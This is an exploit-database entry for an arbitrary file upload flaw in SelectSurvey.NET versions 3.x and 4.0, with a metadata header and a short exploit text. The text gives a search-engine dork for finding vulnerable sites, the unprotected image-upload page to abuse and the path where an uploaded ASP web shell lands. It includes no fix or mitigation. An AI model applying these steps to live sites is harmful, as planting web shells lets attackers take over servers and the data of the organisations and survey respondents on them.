SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload

Author: 040
type: webapps
platform: asp
port: 
date_added: 2013-01-03 
date_updated: 2013-01-03 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

=============================================================
SelectSurvey CMS (ASP.NET) Shell Upload Vulnerability
=============================================================

###################################################
#
# Exploit Title: SelectSurvey.NETv4 CMS (ASP.NET) Shell Upload Vulnerability
# DDate: 20/12/2012
# Author: 040
# Software Link: www.classapps.com
# Version: 3.x . 4.0
# Tested on: windows
# dork : "SelectSurvey.NETv4 site:uk"
# Contact: cyber040@hotmail.com ~ @04hazmi
#
####################################################

    exploit # /survey/UploadImagePopup.aspx

or http://survey.site.com/UploadImagePopup.aspx


  Upload to # http://site.com/UploadedImages/shell.asp


#######################################################


Greetz :  Matlo3a-Dz